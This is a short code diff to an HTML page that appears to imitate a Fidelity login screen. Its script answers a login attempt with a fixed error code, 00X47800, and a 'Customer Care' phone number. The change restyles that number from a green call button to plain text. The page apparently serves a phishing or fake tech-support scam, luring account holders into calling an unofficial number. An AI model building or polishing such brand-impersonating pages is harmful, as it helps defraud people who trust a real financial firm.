--- a/index.html
+++ b/index.html
@@ -199,8 +199,8 @@
     <div class="signup-link">
         New to Fidelity? <a href="#">Open an account or sign up.</a>
     </div>
-        <!-- Replace the static number text in the error message -->
-    <script>
+
+        <script>
         // Function to save username to localStorage if "Remember my username" is checked
         function saveUsername() {
             const username = document.getElementById('username').value;
@@ -225,8 +225,7 @@
         // Show error message on login attempt
         function showErrorMessage() {
             const errorMessage = document.getElementById('error-message');
-            errorMessage.innerHTML = `Error Code : 00X47800 <br> Contact Customer Care: 
-            <a href="tel:+18444991812" style="background-color: #28a745; color: white; padding: 10px 15px; border-radius: 5px; text-decoration: none;">+1-844-499-1812</a>`;
+            errorMessage.innerHTML = 'Error Code : 00X47800 <br> Contact Customer Care : +1-844-499-1812';
         }
 
         // Handle form submission
